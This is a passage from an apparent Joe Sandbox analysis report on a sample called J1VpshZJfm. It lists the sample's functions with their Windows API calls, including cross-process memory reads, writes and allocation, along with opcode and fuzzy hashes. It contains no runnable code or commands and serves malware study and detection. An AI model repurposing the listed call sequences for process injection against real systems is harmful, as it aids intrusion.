SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EE9392
__itow.LIBCMT ref: 00EE93A3

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: b13ebe7c6e80213d92432403b7b06a3604624fb59a644ef03ca4265042fe552e
Instruction ID: e09a5df30a3a48ae478b76ce3fdb61c6d3defb3187b532718ecbbb89f83cb49f
Opcode Fuzzy Hash: b13ebe7c6e80213d92432403b7b06a3604624fb59a644ef03ca4265042fe552e
Instruction Fuzzy Hash: DA21073170024CBBDB20AA669C86EEE7BE9EB48710F046025FD44F71C2D6B0CD459791

Function 00F05A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00F05A6E
GetForegroundWindow.USER32 ref: 00F05A85
GetDC.USER32(00000000), ref: 00F05AC1
GetPixel.GDI32(00000000,?,00000003), ref: 00F05ACD
ReleaseDC.USER32(00000000,00000003), ref: 00F05B08

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 414719a25fa7a405ae6e937754b11e5b000856288044553fb8eebbb899e92815
Instruction ID: e25c620b67953832216dc0e606d0d25564365d9b743117183cb6c05fe967590b
Opcode Fuzzy Hash: 414719a25fa7a405ae6e937754b11e5b000856288044553fb8eebbb899e92815
Instruction Fuzzy Hash: 5D21A435A00108AFDB14EF68DC84AAAB7E5EF48310F15C07DF809D7352DA74AC04EB90

Function 00E912F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E9134D
SelectObject.GDI32(?,00000000), ref: 00E9135C
BeginPath.GDI32(?), ref: 00E91373
SelectObject.GDI32(?,00000000), ref: 00E9139C

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 9a1ad0fb87bd77b731b0cdba688ce5195879bbf2fc65ede0482a4fa5bb185336
Instruction ID: 60ec3cd2210576891af52b5b894fce85203f20bf271eaec81f0c69329d9dcd9c
Opcode Fuzzy Hash: 9a1ad0fb87bd77b731b0cdba688ce5195879bbf2fc65ede0482a4fa5bb185336
Instruction Fuzzy Hash: 3321483080070DEBDF10CF25DD04BAD7BB8AB10B27F1582AAE911A65B0D3719995EF90

Function 00EEBC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00EEBCB3
_memcmp.LIBCMT ref: 00EEBCD1
_memcmp.LIBCMT ref: 00EEBCE4
_memcmp.LIBCMT ref: 00EEBCFC
_memcmp.LIBCMT ref: 00EEBD14

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: fa748685bcc4cfcb25f88086a4547d50e01b3a3e2fd791c6ce6775a0715c22c0
Instruction ID: 296a078f1a3740924d8f7dd9190cea6ecbe9477af9995abba3aea4c86a5e8488
Opcode Fuzzy Hash: fa748685bcc4cfcb25f88086a4547d50e01b3a3e2fd791c6ce6775a0715c22c0
Instruction Fuzzy Hash: B201F57160415D7BD2016B12AD52FFBB39CDE103A8B185420FD04B6342FB10DE10D6A1

Function 00EF4A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00EF4ABA
__beginthreadex.LIBCMT ref: 00EF4AD8
MessageBoxW.USER32(?,?,?,?), ref: 00EF4AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00EF4B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00EF4B0A

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 1bed6bb9342891f160c56160ad39a08fda2a08f345bdb23caa5a4e1628e06759
Instruction ID: 839c72a88b5e8d711e6d51c2d778c6a6ab0a650e461a9007ca216b2c31490d5c
Opcode Fuzzy Hash: 1bed6bb9342891f160c56160ad39a08fda2a08f345bdb23caa5a4e1628e06759
Instruction Fuzzy Hash: 1F1108B690470CBBD7018FA89C04AEB7FACEB45321F144265FA14E3291D671C90497A0

Function 00EE8202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EE821E
GetLastError.KERNEL32(?,00EE7CE2,?,?,?), ref: 00EE8228
GetProcessHeap.KERNEL32(00000008,?,?,00EE7CE2,?,?,?), ref: 00EE8237
HeapAlloc.KERNEL32(00000000,?,00EE7CE2,?,?,?), ref: 00EE823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EE8255

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 1a68cf56c53606df6bc05388be5581c9d3eb32ec88fdf2ba05d783eb38cdf5ba
Instruction ID: f05e0f1b4ae7ee6914af0759b95e54648a02aa0b3cec63ad8a23a4175dd89622
Opcode Fuzzy Hash: 1a68cf56c53606df6bc05388be5581c9d3eb32ec88fdf2ba05d783eb38cdf5ba
Instruction Fuzzy Hash: 11016971200648BFDB204FA6ED48DAB7BACEF8A758B504569F90DD2220DA318C04EA60

Function 00EE710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EE7044,80070057,?,?,?,00EE7455), ref: 00EE7127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EE7044,80070057,?,?), ref: 00EE7142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EE7044,80070057,?,?), ref: 00EE7150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EE7044,80070057,?), ref: 00EE7160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EE7044,80070057,?,?), ref: 00EE716C

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: a683d768403ff4e36de79b43c03cbf4666d6df269b78d67e1952f14c6bcc2e73
Instruction ID: 734303f87ba87c3d60c90e830a520fb0d46cf50ba363bf135a011f329380221c
Opcode Fuzzy Hash: a683d768403ff4e36de79b43c03cbf4666d6df269b78d67e1952f14c6bcc2e73
Instruction Fuzzy Hash: 6201DF7260230CBBCB108F65DC44BAA7BACEF447A1F154068FD88E2220E731DD01ABA0

Function 00EF5244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EF5260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00EF526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EF5276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00EF5280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EF52BC

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 8ec3428aaf5b01828b8edc4df223ba5764f0097c591787635483473dbdf76d41
Instruction ID: d95c7349d52027cc1bdc629a3b096b4cca9362a6a4f1e60df6383bf9522c0ac3
Opcode Fuzzy Hash: 8ec3428aaf5b01828b8edc4df223ba5764f0097c591787635483473dbdf76d41
Instruction Fuzzy Hash: DD016932D01A1DEBDF00EFE4E849AEDBB78FB1C311F41525AEA45B2251CB3095549BA1

Function 00EE810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00EE8121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00EE812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EE813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00EE8141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EE8157

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: e569939c8c6665f135264eb0393eb9f6224e76b80f7f8cd6c44c27b1f6674bc1
Instruction ID: 6a587163102a0a130598539dbbc75cb196e6bf2981a73c1fd1f8d0816814e234
Opcode Fuzzy Hash: e569939c8c6665f135264eb0393eb9f6224e76b80f7f8cd6c44c27b1f6674bc1
Instruction Fuzzy Hash: D7F0C270201308BFEB110FA5EC88EA73BACFF49758F004025F949D2151CB609D05EA60

Function 00EEC1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00EEC1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 00EEC20E
MessageBeep.USER32(00000000), ref: 00EEC226
KillTimer.USER32(?,0000040A), ref: 00EEC242
EndDialog.USER32(?,00000001), ref: 00EEC25C

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 1436f59633c710217f03d33e343662097bf23b023e03d8de8a33dd57fbd8ea81
Instruction ID: fbdf6f1e0e71c8e741cd1c1b5c598386f552532279c095f5754e1f2bfbfb9d62
Opcode Fuzzy Hash: 1436f59633c710217f03d33e343662097bf23b023e03d8de8a33dd57fbd8ea81
Instruction Fuzzy Hash: 4901A230904B0CABEB245B65ED4EBD677B8BB04B06F004269A682A14F0DBE069499B90

Function 00E913B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00E913BF
StrokeAndFillPath.GDI32(?,?,00ECB888,00000000,?), ref: 00E913DB
SelectObject.GDI32(?,00000000), ref: 00E913EE
DeleteObject.GDI32 ref: 00E91401
StrokePath.GDI32(?), ref: 00E9141C

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 84863f7d5165e65e458e66ed16341cbf51de8a46e67257aeb4ec59de04984e67
Instruction ID: 164520b50fe36bcc01a80510a41a31441dafb6bd00380c1c456555f9723b6106
Opcode Fuzzy Hash: 84863f7d5165e65e458e66ed16341cbf51de8a46e67257aeb4ec59de04984e67
Instruction Fuzzy Hash: B2F0C430004B0DEBDF119F26EC5C7983BA4AB2572BF09D264E52A995F1C7318999EF50

Function 00EFC397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00EFC432
CoCreateInstance.OLE32(00F22D6C,00000000,00000001,00F22BDC,?), ref: 00EFC44A

Part of subcall function 00E97DE1: _memmove.LIBCMT ref: 00E97E22

CoUninitialize.OLE32 ref: 00EFC6B7

Strings

.lnk, xrefs: 00EFC3C6, 00EFC3EE, 00EFC3F8

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: b5645c3c9bd04618bec3e040110b2e7a89b6f2c751a2fec78139c6a172e48a90
Instruction ID: 51c8374e93ea381b7f1bf6e0b31d0b6c3fff8f57372285bbfb9c9f1dec4992c8
Opcode Fuzzy Hash: b5645c3c9bd04618bec3e040110b2e7a89b6f2c751a2fec78139c6a172e48a90
Instruction Fuzzy Hash: 97A13BB1108205AFD704EF64C891EAFB7E8FF95354F00592CF195A71A2EB71EA09CB52

Function 00EA2CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00EB0DB6: std::exception::exception.LIBCMT ref: 00EB0DEC
Part of subcall function 00EB0DB6: __CxxThrowException@8.LIBCMT ref: 00EB0E01

Part of subcall function 00E97DE1: _memmove.LIBCMT ref: 00E97E22

Part of subcall function 00E97A51: _memmove.LIBCMT ref: 00E97AAB

__swprintf.LIBCMT ref: 00EA2ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00EA2D66

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 0725c6ba996cb20b2d33c4b69a0cdf5935e38d6dc9e0b2350168f6043450299b
Instruction ID: 223962545e812eebecacef8bd9ced1ed49bf41057fdcdedd81824e0adef718e9
Opcode Fuzzy Hash: 0725c6ba996cb20b2d33c4b69a0cdf5935e38d6dc9e0b2350168f6043450299b
Instruction Fuzzy Hash: F3916D711182019FCB15EF28C885CAFB7E4EF99714F00691EF595BB2A1EA30ED49CB52

Function 00EFB93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00E94750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E94743,?,?,00E937AE,?), ref: 00E94770

CoInitialize.OLE32(00000000), ref: 00EFB9BB
CoCreateInstance.OLE32(00F22D6C,00000000,00000001,00F22BDC,?), ref: 00EFB9D4
CoUninitialize.OLE32 ref: 00EFB9F1

Part of subcall function 00E99837: __itow.LIBCMT ref: 00E99862
Part of subcall function 00E99837: __swprintf.LIBCMT ref: 00E998AC

Strings

.lnk, xrefs: 00EFB99D, 00EFB9AB

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 684f9d068c33e1bd7d48e2354a0f5a0e68ca4c9dc233c6fade2aa6b932bbcc9b
Instruction ID: e5261c1561e273eb69e283ed328c09c0222568e59da860a629f87c1a7f5d258a
Opcode Fuzzy Hash: 684f9d068c33e1bd7d48e2354a0f5a0e68ca4c9dc233c6fade2aa6b932bbcc9b
Instruction Fuzzy Hash: 50A133756042059FCB14DF14C884D6ABBE5FF89324F048988F999AB2A2DB31EC45CB91

Function 00EB501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00EB50AD

Part of subcall function 00EC00F0: __87except.LIBCMT ref: 00EC012B

Strings

pow, xrefs: 00EB5085, 00EB50A2

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: be53bc37c183fe9a10bd6cd3b048d777346917a25638c93ffa18a25ff57fb9db
Instruction ID: 1fbee290799a0d9eba4711bb8c47c8c9a21f1ac8f6eb471cc680f22e4ab27241
Opcode Fuzzy Hash: be53bc37c183fe9a10bd6cd3b048d777346917a25638c93ffa18a25ff57fb9db
Instruction Fuzzy Hash: 7651BF3290DA05C7DB15772CCA057FF7BD4DB00304F24AD5CE4D5A62AADE368DC6AA82

Function 00ED8584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00ED862B
_memmove.LIBCMT ref: 00ED8685

Strings

_, xrefs: 00ED86FF, 00EDDFDC, 00EDDFF8
3c, xrefs: 00ED860C

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: _memmove
String ID: 3c$_
API String ID: 4104443479-4099079164
Opcode ID: b140f1345b3c3d330fc50e6c294ff162bd1f88615b1a3ccf240f282f07d710ba
Instruction ID: 7e45771851233f34406ea13d336275026ceee09fce92adfcbb8e94bbf38ed54b
Opcode Fuzzy Hash: b140f1345b3c3d330fc50e6c294ff162bd1f88615b1a3ccf240f282f07d710ba
Instruction Fuzzy Hash: F8516FB09006099FCF24CF68D984AAEB7F1FF45314F14852AE85AEB350EB31E956CB51

Function 00EE97F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00EE9296,?,?,00000034,00000800,?,00000034), ref: 00EF14E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00EE983F

Part of subcall function 00EF1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00EE92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00EF14B1

Part of subcall function 00EF13DE: GetWindowThreadProcessId.USER32(?,?), ref: 00EF1409
Part of subcall function 00EF13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00EE925A,00000034,?,?,00001004,00000000,00000000), ref: 00EF1419
Part of subcall function 00EF13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00EE925A,00000034,?,?,00001004,00000000,00000000), ref: 00EF142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00EE98AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00EE98F9

Strings

@, xrefs: 00EE9911

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
